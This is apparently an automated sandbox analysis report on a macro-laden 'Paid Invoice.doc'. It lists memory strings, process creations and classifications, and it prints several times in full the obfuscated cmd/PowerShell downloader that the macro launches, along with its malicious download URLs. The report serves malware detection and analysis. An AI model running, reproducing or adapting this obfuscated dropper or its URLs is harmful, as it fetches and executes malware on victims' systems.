Source: iexplore.exeString found in binary or memory: http://www.bing.com/maps/
Source: iexplore.exeString found in binary or memory: http://www.bing.com/maps/default.aspx
Source: iexplore.exeString found in binary or memory: http://www.bing.com/maps/geotager.aspx
Source: iexplore.exeString found in binary or memory: http://www.bing.com/safety/warning
Source: iexplore.exeString found in binary or memory: http://www.bing.com/search?q=
Source: iexplore.exeString found in binary or memory: http://www.bing.com/search?q=%7BsearchTerms%7D&src=IE-SearchBox&FORM=IESR02b
Source: iexplore.exeString found in binary or memory: http://www.bing.com/search?q=&src=IE-SearchBox&FORM=IENTSRguage
Source: iexplore.exeString found in binary or memory: http://www.cdiscount.com/
Source: iexplore.exeString found in binary or memory: http://www.cdiscount.com/favicon.ico
Source: iexplore.exeString found in binary or memory: http://www.ceneo.pl/
Source: iexplore.exeString found in binary or memory: http://www.ceneo.pl/favicon.ico
Source: iexplore.exeString found in binary or memory: http://www.chennaionline.com/ncommon/images/collogo.ico
Source: iexplore.exeString found in binary or memory: http://www.cjmall.com/
Source: iexplore.exeString found in binary or memory: http://www.cjmall.com/favicon.ico
Source: iexplore.exeString found in binary or memory: http://www.clarin.com/favicon.ico
Source: iexplore.exeString found in binary or memory: http://www.cnet.co.uk/
Source: iexplore.exeString found in binary or memory: http://www.cnet.com/favicon.ico
Source: iexplore.exeString found in binary or memory: http://www.dailymail.co.uk/
Source: iexplore.exeString found in binary or memory: http://www.dailymail.co.uk/favicon.ico
Source: iexplore.exeString found in binary or memory: http://www.digicert.com.my/cps.htm02
Source: iexplore.exeString found in binary or memory: http://www.diginotar.nl/cps/pkioverheid0
Source: iexplore.exeString found in binary or memory: http://www.etmall.com.tw/
Source: iexplore.exeString found in binary or memory: http://www.etmall.com.tw/favicon.ico
Source: iexplore.exeString found in binary or memory: http://www.excite.co.jp/
Source: iexplore.exeString found in binary or memory: http://www.expedia.com/
Source: iexplore.exeString found in binary or memory: http://www.expedia.com/favicon.ico
Source: iexplore.exeString found in binary or memory: http://www.facebook.com/
Source: iexplore.exeString found in binary or memory: http://www.facebook.com/favicon.ico
Source: iexplore.exeString found in binary or memory: http://www.gismeteo.ru/favicon.ico
Source: iexplore.exeString found in binary or memory: http://www.gmarket.co.kr/
Source: iexplore.exeString found in binary or memory: http://www.gmarket.co.kr/favicon.ico
Source: iexplore.exeString found in binary or memory: http://www.google.co.in/
Source: iexplore.exeString found in binary or memory: http://www.google.co.jp/
Source: iexplore.exeString found in binary or memory: http://www.google.co.uk/
Source: iexplore.exeString found in binary or memory: http://www.google.com.br/
Source: iexplore.exeString found in binary or memory: http://www.google.com.sa/
Source: iexplore.exeString found in binary or memory: http://www.google.com.tw/
Source: iexplore.exeString found in binary or memory: http://www.google.com/
Source: iexplore.exeString found in binary or memory: http://www.google.com/favicon.ico
Source: iexplore.exeString found in binary or memory: http://www.google.cz/
Source: iexplore.exeString found in binary or memory: http://www.google.de/
Source: iexplore.exeString found in binary or memory: http://www.google.es/
Source: iexplore.exeString found in binary or memory: http://www.google.fr/
Source: iexplore.exeString found in binary or memory: http://www.google.it/
Source: iexplore.exeString found in binary or memory: http://www.google.pl/
Source: iexplore.exeString found in binary or memory: http://www.google.ru/
Source: iexplore.exeString found in binary or memory: http://www.google.si/
Source: iexplore.exeString found in binary or memory: http://www.iask.com/
Source: iexplore.exeString found in binary or memory: http://www.iask.com/favicon.ico
Source: iexplore.exeString found in binary or memory: http://www.kkbox.com.tw/
Source: iexplore.exeString found in binary or memory: http://www.kkbox.com.tw/favicon.ico
Source: iexplore.exeString found in binary or memory: http://www.linternaute.com/favicon.ico
Source: iexplore.exeString found in binary or memory: http://www.maktoob.com/favicon.ico
Source: iexplore.exeString found in binary or memory: http://www.mercadolibre.com.mx/
Source: iexplore.exeString found in binary or memory: http://www.mercadolibre.com.mx/favicon.ico
Source: iexplore.exeString found in binary or memory: http://www.mercadolivre.com.br/
Source: iexplore.exeString found in binary or memory: http://www.mercadolivre.com.br/favicon.ico
Source: iexplore.exeString found in binary or memory: http://www.merlin.com.pl/
Source: iexplore.exeString found in binary or memory: http://www.merlin.com.pl/favicon.ico
Source: iexplore.exeString found in binary or memory: http://www.microsofttranslator.com/?ref=IE8Activity
Source: iexplore.exeString found in binary or memory: http://www.microsofttranslator.com/BV.aspx?ref=IE8Activity&amp;a=
Source: iexplore.exeString found in binary or memory: http://www.microsofttranslator.com/BVPrev.aspx?ref=IE8Activity
Source: iexplore.exeString found in binary or memory: http://www.microsofttranslator.com/Default.aspx?ref=IE8Activity
Source: iexplore.exeString found in binary or memory: http://www.microsofttranslator.com/DefaultPrev.aspx?ref=IE8Activity
Source: iexplore.exeString found in binary or memory: http://www.mtv.com/
Source: iexplore.exeString found in binary or memory: http://www.mtv.com/favicon.ico
Source: iexplore.exeString found in binary or memory: http://www.myspace.com/favicon.ico
Source: iexplore.exeString found in binary or memory: http://www.najdi.si/
Source: iexplore.exeString found in binary or memory: http://www.najdi.si/favicon.ico
Source: iexplore.exeString found in binary or memory: http://www.nate.com/favicon.ico
Source: iexplore.exeString found in binary or memory: http://www.neckermann.de/
Source: iexplore.exeString found in binary or memory: http://www.neckermann.de/favicon.ico
Source: iexplore.exeString found in binary or memory: http://www.news.com.au/favicon.ico
Source: iexplore.exeString found in binary or memory: http://www.nifty.com/favicon.ico
Source: iexplore.exeString found in binary or memory: http://www.ocn.ne.jp/favicon.ico
Source: iexplore.exeString found in binary or memory: http://www.orange.fr/
Source: iexplore.exeString found in binary or memory: http://www.otto.de/favicon.ico
Source: iexplore.exeString found in binary or memory: http://www.ozon.ru/
Source: iexplore.exeString found in binary or memory: http://www.ozon.ru/favicon.ico
Source: iexplore.exeString found in binary or memory: http://www.ozu.es/favicon.ico
Source: iexplore.exeString found in binary or memory: http://www.paginasamarillas.es/
Source: iexplore.exeString found in binary or memory: http://www.paginasamarillas.es/favicon.ico
Source: iexplore.exeString found in binary or memory: http://www.pchome.com.tw/favicon.ico
Source: iexplore.exeString found in binary or memory: http://www.priceminister.com/
Source: iexplore.exeString found in binary or memory: http://www.priceminister.com/favicon.ico
Source: iexplore.exeString found in binary or memory: http://www.public-trust.com/CPS/OmniRoot.html0
Source: iexplore.exeString found in binary or memory: http://www.public-trust.com/cgi-bin/CRL/2018/cdp.crl0
Source: iexplore.exeString found in binary or memory: http://www.rakuten.co.jp/favicon.ico
Source: iexplore.exeString found in binary or memory: http://www.rambler.ru/
Source: iexplore.exeString found in binary or memory: http://www.rambler.ru/favicon.ico
Source: iexplore.exeString found in binary or memory: http://www.recherche.aol.fr/
Source: iexplore.exeString found in binary or memory: http://www.rtl.de/
Source: iexplore.exeString found in binary or memory: http://www.rtl.de/favicon.ico
Source: iexplore.exeString found in binary or memory: http://www.servicios.clarin.com/
Source: iexplore.exeString found in binary or memory: http://www.shopzilla.com/
Source: iexplore.exeString found in binary or memory: http://www.sify.com/favicon.ico
Source: iexplore.exeString found in binary or memory: http://www.so-net.ne.jp/share/favicon.ico
Source: iexplore.exeString found in binary or memory: http://www.sogou.com/
Source: iexplore.exeString found in binary or memory: http://www.sogou.com/favicon.ico
Source: iexplore.exeString found in binary or memory: http://www.soso.com/
Source: iexplore.exeString found in binary or memory: http://www.soso.com/favicon.ico
Source: iexplore.exeString found in binary or memory: http://www.t-online.de/favicon.ico
Source: iexplore.exeString found in binary or memory: http://www.taobao.com/
Source: iexplore.exeString found in binary or memory: http://www.taobao.com/favicon.ico
Source: iexplore.exeString found in binary or memory: http://www.target.com/
Source: iexplore.exeString found in binary or memory: http://www.target.com/favicon.ico
Source: iexplore.exeString found in binary or memory: http://www.tchibo.de/
Source: iexplore.exeString found in binary or memory: http://www.tchibo.de/favicon.ico
Source: iexplore.exeString found in binary or memory: http://www.tesco.com/
Source: iexplore.exeString found in binary or memory: http://www.tesco.com/favicon.ico
Source: iexplore.exeString found in binary or memory: http://www.timesonline.co.uk/img/favicon.ico
Source: iexplore.exeString found in binary or memory: http://www.tiscali.it/favicon.ico
Source: powershell.exeString found in binary or memory: http://www.umbriawifi.it/Ue8J/
Source: iexplore.exeString found in binary or memory: http://www.univision.com/
Source: iexplore.exeString found in binary or memory: http://www.univision.com/favicon.ico
Source: iexplore.exeString found in binary or memory: http://www.usertrust.com1
Source: iexplore.exeString found in binary or memory: http://www.walmart.com/
Source: iexplore.exeString found in binary or memory: http://www.walmart.com/favicon.ico
Source: iexplore.exeString found in binary or memory: http://www.weather.com/
Source: iexplore.exeString found in binary or memory: http://www.weather.com/favicon.ico
Source: iexplore.exeString found in binary or memory: http://www.ya.com/favicon.ico
Source: iexplore.exeString found in binary or memory: http://www.yam.com/favicon.ico
Source: iexplore.exeString found in binary or memory: http://www.yandex.ru/
Source: iexplore.exeString found in binary or memory: http://www.yandex.ru/favicon.ico
Source: iexplore.exeString found in binary or memory: http://www3.fnac.com/
Source: iexplore.exeString found in binary or memory: http://www3.fnac.com/favicon.ico
Source: iexplore.exeString found in binary or memory: http://xml-us.amznxslt.com/onca/xml?Service=AWSECommerceService&amp;Version=2008-06-26&amp;Operation
Source: iexplore.exeString found in binary or memory: http://yellowpages.superpages.com/
Source: iexplore.exeString found in binary or memory: http://yellowpages.superpages.com/favicon.ico
Source: iexplore.exeString found in binary or memory: http://z.about.com/m/a08.ico
Source: iexplore.exeString found in binary or memory: https://
Source: iexplore.exeString found in binary or memory: https://en.wikipedia.org/wiki/XSLT/Muenchian_grouping
Source: iexplore.exeString found in binary or memory: https://example.com
Source: iexplore.exeString found in binary or memory: https://secure.comodo.com/CPS0
Source: powershell.exeString found in binary or memory: https://ww
Source: iexplore.exeString found in binary or memory: https://www.bing.com/
Source: iexplore.exeString found in binary or memory: https://www.bing.com/ah
Source: iexplore.exeString found in binary or memory: https://www.bing.com/favicon.ico
Source: iexplore.exeString found in binary or memory: https://www.bing.com/favicon.ico:0
Source: iexplore.exeString found in binary or memory: https://www.digicert.com/CPS0
Source: iexplore.exeString found in binary or memory: https://www.example.com.
Source: iexplore.exeString found in binary or memory: https://www.mi
Source: iexplore.exeString found in binary or memory: https://www.microso
Source: iexplore.exeString found in binary or memory: https://www.msn.com/spartan/ientp?locale=en-US&market=US&enableregulatorypsm=0&NTLogo=1
Source: powershell.exeString found in binary or memory: https://www.nor
Source: powershell.exeString found in binary or memory: https://www.norX
Source: powershell.exeString found in binary or memory: https://www.nors
Source: powershell.exeString found in binary or memory: https://www.norst
Source: powershell.exeString found in binary or memory: https://www.norste
Source: powershell.exeString found in binary or memory: https://www.norsterra.cn
Source: powershell.exeString found in binary or memory: https://www.norsterra.cn/EsD2/
Source: powershell.exeString found in binary or memory: https://www.norsterra.cn/EsD2/8
Source: powershell.exeString found in binary or memory: https://www.norsterra.cn/EsD2/?
Source: powershell.exeString found in binary or memory: https://www.norsterra.cn/EsD2/?htt
Source: powershell.exeString found in binary or memory: https://www.norsterra.cn/EsD2/?http:/
Source: powershell.exeString found in binary or memory: https://www.norsterra.cn/EsD2/?http://tce
Source: powershell.exeString found in binary or memory: https://www.norsterra.cn/EsD2/?http://tceele.com/NCbJ/?ht
Source: powershell.exeString found in binary or memory: https://www.norsterra.cn/EsD2/?http://tceele.com/NCbJ/?http://a
Source: powershell.exeString found in binary or memory: https://www.norsterra.cn/EsD2/?http://tceele.com/NCbJ/?http://ab
Source: powershell.exeString found in binary or memory: https://www.norsterra.cn/EsD2/?http://tceele.com/NCbJ/?http://abou
Source: powershell.exeString found in binary or memory: https://www.norsterra.cn/EsD2/?http://tceele.com/NCbJ/?http://about
Source: powershell.exeString found in binary or memory: https://www.norsterra.cn/EsD2/?http://tceele.com/NCbJ/?http://about.megaxus
Source: powershell.exeString found in binary or memory: https://www.norsterra.cn/EsD2/?http://tceele.com/NCbJ/?http://about.megaxus.
Source: powershell.exeString found in binary or memory: https://www.norsterra.cn/EsD2/?http://tceele.com/NCbJ/?http://about.megaxus.com/v1/images/a
Source: powershell.exeString found in binary or memory: https://www.norsterra.cn/EsD2/?http://tceele.com/NCbJ/?http://about.megaxus.com/v1/images/ar
Source: powershell.exeString found in binary or memory: https://www.norsterra.cn/EsD2/?http://tceele.com/NCbJ/?http://about.megaxus.com/v1/images/artic
Source: powershell.exeString found in binary or memory: https://www.norsterra.cn/EsD2/?http://tceele.com/NCbJ/?http://about.megaxus.com/v1/images/article
Source: powershell.exeString found in binary or memory: https://www.norsterra.cn/EsD2/?http://tceele.com/NCbJ/?http://about.megaxus.com/v1/images/article/
Source: powershell.exeString found in binary or memory: https://www.norsterra.cn/EsD2/?http://tceele.com/NCbJ/?http://about.megaxus.com/v1/images/article/Ip
Source: powershell.exeString found in binary or memory: https://www.norsterra.cnx&Zk
Uses HTTPSShow sources
Source: unknownNetwork traffic detected: HTTP traffic on port 49180 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49180
Social media urls found in memory dataShow sources
Source: iexplore.exeString found in binary or memory: http://www.facebook.com/
Source: iexplore.exeString found in binary or memory: http://www.facebook.com/favicon.ico

Data Obfuscation:

barindex
Document contains an embedded VBA with many randomly named variablesShow sources
Source: Paid Invoice[1].doc.1.drStream path 'Macros/VBA/NTiRlViMWCoM' : High entropy of concatenated variable names
Source: Paid Invoice.doc.usc4tz8.partial.1.drStream path 'Macros/VBA/NTiRlViMWCoM' : High entropy of concatenated variable names
Obfuscated command line foundShow sources
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd uhdfgpo jas jjjsjjsjsdiuwqu ioqwu efdgdfgpoqw jdjska dhakjbhdbqwuiqwh hiqwoeqwpi poqw eqw & %C^om^S^p^Ec% /V /c set %wZvEfQF%=p^o^w^er&&set %dZbwmkEttUGV%=^sh^ell&&!%wZvEfQF%!!%dZbwmkEttUGV%! ' & ( $verbosEPrefErEnCe.tOsTRinG()[1,3]+'X'-jOIN'')((('((l5M (ngS((mngS+ngSgY'+'tL8nsadasd = &(EmgY+mgYnmgY+mgYynEny+EmgY'+'+mgY'+'nyeEny+l5M+l5MEl5M+l5Mnyw-obmgY+mgYjecEny+'+'EnmgY+'+'mg'+'YngS+ngSytEnmn'+'gS+ngSgY+m'+'gYy) ramgY+mgYnmgY+mgYdoml5M+l5M;mgY+'+'mgYtmgY+mgl5M+l5MYL8YmgY+mgYYmgY+mgYU = .(EnymgY+mgYneEngS+ngSny+mgY+mgYEnywmgYngS+ngS+mg'+'YEny+Eny-objmgYngS+ngS+mg'+'YectEnymgY+mg'+'Y) S'+'yl5M+l5MstengS+ngSm.Nl5M+l5Meml5M+l5M'+'gY+mgYt.WemgY+mgYbC'+'lienngS+l5M+l5MngSl5M+l5Mt;t'+'L8mgY+mgYNSB =l5M+l5M tL8mgY+mgYnsngS+ngSadasdmgY+mgY.mgY+mgYnext(10000mgY+l5M'+'+l5MmgY,l5M+l5MmgY+mgn'+'gS+ngS'+'Y 28mgY+m'+'ngS+ngSgY213mgY+mgY3);t'+'L8ngS+ngSADCmgY+mgYX =mgY+mg'+'Y mgY+mgYEnmgY+m'+'gYy '+'httng'+'l5M+'+'l5MS+ngSps:l5M+l5M/m'+'gY+mgYngS+ngS/w
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd uhdfgpo jas jjjsjjsjsdiuwqu ioqwu efdgdfgpoqw jdjska dhakjbhdbqwuiqwh hiqwoeqwpi poqw eqw & %C^om^S^p^Ec% /V /c set %wZvEfQF%=p^o^w^er&&set %dZbwmkEttUGV%=^sh^ell&&!%wZvEfQF%!!%dZbwmkEttUGV%! ' & ( $verbosEPrefErEnCe.tOsTRinG()[1,3]+'X'-jOIN'')((('((l5M (ngS((mngS+ngSgY'+'tL8nsadasd = &(EmgY+mgYnmgY+mgYynEny+EmgY'+'+mgY'+'nyeEny+l5M+l5MEl5M+l5Mnyw-obmgY+mgYjecEny+'+'EnmgY+'+'mg'+'YngS+ngSytEnmn'+'gS+ngSgY+m'+'gYy) ramgY+mgYnmgY+mgYdoml5M+l5M;mgY+'+'mgYtmgY+mgl5M+l5MYL8YmgY+mgYYmgY+mgYU = .(EnymgY+mgYneEngS+ngSny+mgY+mgYEnywmgYngS+ngS+mg'+'YEny+Eny-objmgYngS+ngS+mg'+'YectEnymgY+mg'+'Y) S'+'yl5M+l5MstengS+ngSm.Nl5M+l5Meml5M+l5M'+'gY+mgYt.WemgY+mgYbC'+'lienngS+l5M+l5MngSl5M+l5Mt;t'+'L8mgY+mgYNSB =l5M+l5M tL8mgY+mgYnsngS+ngSadasdmgY+mgY.mgY+mgYnext(10000mgY+l5M'+'+l5MmgY,l5M+l5MmgY+mgn'+'gS+ngS'+'Y 28mgY+m'+'ngS+ngSgY213mgY+mgY3);t'+'L8ngS+ngSADCmgY+mgYX =mgY+mg'+'Y mgY+mgYEnmgY+m'+'gYy '+'httng'+'l5M+'+'l5MS+ngSps:l5M+l5M/m'+'gY+mgYngS+ngS/w
Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell ' & ( $verbosEPrefErEnCe.tOsTRinG()[1,3]+'X'-jOIN'')((('((l5M (ngS((mngS+ngSgY'+'tL8nsadasd = &(EmgY+mgYnmgY+mgYynEny+EmgY'+'+mgY'+'nyeEny+l5M+l5MEl5M+l5Mnyw-obmgY+mgYjecEny+'+'EnmgY+'+'mg'+'YngS+ngSytEnmn'+'gS+ngSgY+m'+'gYy) ramgY+mgYnmgY+mgYdoml5M+l5M;mgY+'+'mgYtmgY+mgl5M+l5MYL8YmgY+mgYYmgY+mgYU = .(EnymgY+mgYneEngS+ngSny+mgY+mgYEnywmgYngS+ngS+mg'+'YEny+Eny-objmgYngS+ngS+mg'+'YectEnymgY+mg'+'Y) S'+'yl5M+l5MstengS+ngSm.Nl5M+l5Meml5M+l5M'+'gY+mgYt.WemgY+mgYbC'+'lienngS+l5M+l5MngSl5M+l5Mt;t'+'L8mgY+mgYNSB =l5M+l5M tL8mgY+mgYnsngS+ngSadasdmgY+mgY.mgY+mgYnext(10000mgY+l5M'+'+l5MmgY,l5M+l5MmgY+mgn'+'gS+ngS'+'Y 28mgY+m'+'ngS+ngSgY213mgY+mgY3);t'+'L8ngS+ngSADCmgY+mgYX =mgY+mg'+'Y mgY+mgYEnmgY+m'+'gYy '+'httng'+'l5M+'+'l5MS+ngSps:l5M+l5M/m'+'gY+mgYngS+ngS/wwmgY+mgYw.norsmgY+mgYtmg'+'Y+mgYemgY+mgYrra.cnmgY+mgY/EsD2/?httmgYl5M+l5M+nl5M+l5MgS+ngSmgYp:/mgY+mgY/tcemgY+mgYele.com/NCbJ'+'/?htmgY+mgYtp://al5M+l5MbmgY+mgYoul5M+l5MmgY+'+'mg'+'YtmgY+mgY.megax
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Windows\System32\cmd.exe cmd uhdfgpo jas jjjsjjsjsdiuwqu ioqwu efdgdfgpoqw jdjska dhakjbhdbqwuiqwh hiqwoeqwpi poqw eqw & %C^om^S^p^Ec% /V /c set %wZvEfQF%=p^o^w^er&&set %dZbwmkEttUGV%=^sh^ell&&!%wZvEfQF%!!%dZbwmkEttUGV%! ' & ( $verbosEPrefErEnCe.tOsTRinG()[1,3]+'X'-jOIN'')((('((l5M (ngS((mngS+ngSgY'+'tL8nsadasd = &(EmgY+mgYnmgY+mgYynEny+EmgY'+'+mgY'+'nyeEny+l5M+l5MEl5M+l5Mnyw-obmgY+mgYjecEny+'+'EnmgY+'+'mg'+'YngS+ngSytEnmn'+'gS+ngSgY+m'+'gYy) ramgY+mgYnmgY+mgYdoml5M+l5M;mgY+'+'mgYtmgY+mgl5M+l5MYL8YmgY+mgYYmgY+mgYU = .(EnymgY+mgYneEngS+ngSny+mgY+mgYEnywmgYngS+ngS+mg'+'YEny+Eny-objmgYngS+ngS+mg'+'YectEnymgY+mg'+'Y) S'+'yl5M+l5MstengS+ngSm.Nl5M+l5Meml5M+l5M'+'gY+mgYt.WemgY+mgYbC'+'lienngS+l5M+l5MngSl5M+l5Mt;t'+'L8mgY+mgYNSB =l5M+l5M tL8mgY+mgYnsngS+ngSadasdmgY+mgY.mgY+mgYnext(10000mgY+l5M'+'+l5MmgY,l5M+l5MmgY+mgn'+'gS+ngS'+'Y 28mgY+m'+'ngS+ngSgY213mgY+mgY3);t'+'L8ngS+ngSADCmgY+mgYX =mgY+mg'+'Y mgY+mgYEnmgY+m'+'gYy '+'httng'+'l5M+'+'l5MS+ngSps:l5M+l5M/m'+'gY+mgYngS+ngS/w
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Windows\System32\cmd.exe cmd uhdfgpo jas jjjsjjsjsdiuwqu ioqwu efdgdfgpoqw jdjska dhakjbhdbqwuiqwh hiqwoeqwpi poqw eqw & %C^om^S^p^Ec% /V /c set %wZvEfQF%=p^o^w^er&&set %dZbwmkEttUGV%=^sh^ell&&!%wZvEfQF%!!%dZbwmkEttUGV%! ' & ( $verbosEPrefErEnCe.tOsTRinG()[1,3]+'X'-jOIN'')((('((l5M (ngS((mngS+ngSgY'+'tL8nsadasd = &(EmgY+mgYnmgY+mgYynEny+EmgY'+'+mgY'+'nyeEny+l5M+l5MEl5M+l5Mnyw-obmgY+mgYjecEny+'+'EnmgY+'+'mg'+'YngS+ngSytEnmn'+'gS+ngSgY+m'+'gYy) ramgY+mgYnmgY+mgYdoml5M+l5M;mgY+'+'mgYtmgY+mgl5M+l5MYL8YmgY+mgYYmgY+mgYU = .(EnymgY+mgYneEngS+ngSny+mgY+mgYEnywmgYngS+ngS+mg'+'YEny+Eny-objmgYngS+ngS+mg'+'YectEnymgY+mg'+'Y) S'+'yl5M+l5MstengS+ngSm.Nl5M+l5Meml5M+l5M'+'gY+mgYt.WemgY+mgYbC'+'lienngS+l5M+l5MngSl5M+l5Mt;t'+'L8mgY+mgYNSB =l5M+l5M tL8mgY+mgYnsngS+ngSadasdmgY+mgY.mgY+mgYnext(10000mgY+l5M'+'+l5MmgY,l5M+l5MmgY+mgn'+'gS+ngS'+'Y 28mgY+m'+'ngS+ngSgY213mgY+mgY3);t'+'L8ngS+ngSADCmgY+mgYX =mgY+mg'+'Y mgY+mgYEnmgY+m'+'gYy '+'httng'+'l5M+'+'l5MS+ngSps:l5M+l5M/m'+'gY+mgYngS+ngS/w
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell ' & ( $verbosEPrefErEnCe.tOsTRinG()[1,3]+'X'-jOIN'')((('((l5M (ngS((mngS+ngSgY'+'tL8nsadasd = &(EmgY+mgYnmgY+mgYynEny+EmgY'+'+mgY'+'nyeEny+l5M+l5MEl5M+l5Mnyw-obmgY+mgYjecEny+'+'EnmgY+'+'mg'+'YngS+ngSytEnmn'+'gS+ngSgY+m'+'gYy) ramgY+mgYnmgY+mgYdoml5M+l5M;mgY+'+'mgYtmgY+mgl5M+l5MYL8YmgY+mgYYmgY+mgYU = .(EnymgY+mgYneEngS+ngSny+mgY+mgYEnywmgYngS+ngS+mg'+'YEny+Eny-objmgYngS+ngS+mg'+'YectEnymgY+mg'+'Y) S'+'yl5M+l5MstengS+ngSm.Nl5M+l5Meml5M+l5M'+'gY+mgYt.WemgY+mgYbC'+'lienngS+l5M+l5MngSl5M+l5Mt;t'+'L8mgY+mgYNSB =l5M+l5M tL8mgY+mgYnsngS+ngSadasdmgY+mgY.mgY+mgYnext(10000mgY+l5M'+'+l5MmgY,l5M+l5MmgY+mgn'+'gS+ngS'+'Y 28mgY+m'+'ngS+ngSgY213mgY+mgY3);t'+'L8ngS+ngSADCmgY+mgYX =mgY+mg'+'Y mgY+mgYEnmgY+m'+'gYy '+'httng'+'l5M+'+'l5MS+ngSps:l5M+l5M/m'+'gY+mgYngS+ngS/wwmgY+mgYw.norsmgY+mgYtmg'+'Y+mgYemgY+mgYrra.cnmgY+mgY/EsD2/?httmgYl5M+l5M+nl5M+l5MgS+ngSmgYp:/mgY+mgY/tcemgY+mgYele.com/NCbJ'+'/?htmgY+mgYtp://al5M+l5MbmgY+mgYoul5M+l5MmgY+'+'mg'+'YtmgY+mgY.megax

Spreading:

barindex
Enumerates the file systemShow sources
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch

System Summary:

barindex
Checks whether correct version of .NET is installedShow sources
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\.NETFramework\Policy\Upgrades
Found graphical window changes (likely an installer)Show sources
Source: Window RecorderWindow detected: More than 3 window changes detected
Uses Microsoft SilverlightShow sources
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorrc.dll
Checks if Microsoft Office is installedShow sources
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEKey opened: HKEY_USERS\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems
Uses new MSVCR DllsShow sources
Source: C:\Program Files\Internet Explorer\iexplore.exeFile opened: C:\Windows\WinSxS\x86_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_50916076bcb9a742\MSVCR90.dll
Binary contains paths to debug symbolsShow sources
Source: Binary string: c:\workspace\8-2-build-windows-i586-cygwin\jdk8u144\9417\build\windows-i586\deploy\tmp\ssvagent\obj\ssvagent.pdb source: ssvagent.exe
Source: Binary string: D:\office\Target\word\x86\ship\0\msword.PDB source: WINWORD.EXE
Source: Binary string: mscorrc.pdb source: powershell.exe
Source: Binary string: t:\misc_urlredirection\x86\ship\0\urlredirection.pdb source: iexplore.exe
Source: Binary string: G:\o14sp1\65_VC8\VBE6\legovbe\vbe7.pdb source: WINWORD.EXE
Source: Binary string: G:\o14sp1\65_VC8\VBE6\legovbe\vbe7.pdb> source: WINWORD.EXE
Source: Binary string: 0\urlredirection.dll\bbtopt\urlredirectionO.pdb source: iexplore.exe
Binary contains paths to development resourcesShow sources
Source: WINWORD.EXEBinary or memory string: Unrecognized project languageSThe .VBP file for this project contains an invalid or corrupt library references ID=Error accessing file. Network connection may have been lost.-Fixed or static data can't be larger than 64K
Classification labelShow sources
Source: classification engineClassification label: mal72.evad.expl.win@11/29@8/3
Creates files inside the user directoryShow sources
Source: C:\Program Files\Internet Explorer\iexplore.exeFile created: C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High
Creates temporary filesShow sources
Source: C:\Program Files\Internet Explorer\iexplore.exeFile created: C:\Users\HERBBL~1\AppData\Local\Temp\~DF2B45E99636F7990D.TMP
Parts of this applications are using the .NET runtime (Probably coded in C#)Show sources
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\9f895c66454577eff9c77442d0c84f71\mscorlib.ni.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
Reads ini filesShow sources
Source: C:\Program Files\Internet Explorer\iexplore.exeFile read: C:\Users\desktop.ini
Reads software policiesShow sources
Source: C:\Program Files\Java\jre1.8.0_144\bin\ssvagent.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Spawns processesShow sources
Source: unknownProcess created: C:\Program Files\Internet Explorer\iexplore.exe 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding
Source: unknownProcess created: C:\Program Files\Internet Explorer\iexplore.exe 'C:\Program Files\Internet Explorer\iexplore.exe' SCODEF:3388 CREDAT:275457 /prefetch:2
Source: unknownProcess created: C:\Program Files\Java\jre1.8.0_144\bin\ssvagent.exe 'C:\PROGRA~1\Java\JRE18~1.0_1\bin\ssvagent.exe' -new
Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE 'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /n 'C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\0316J1PS\Paid Invoice.doc
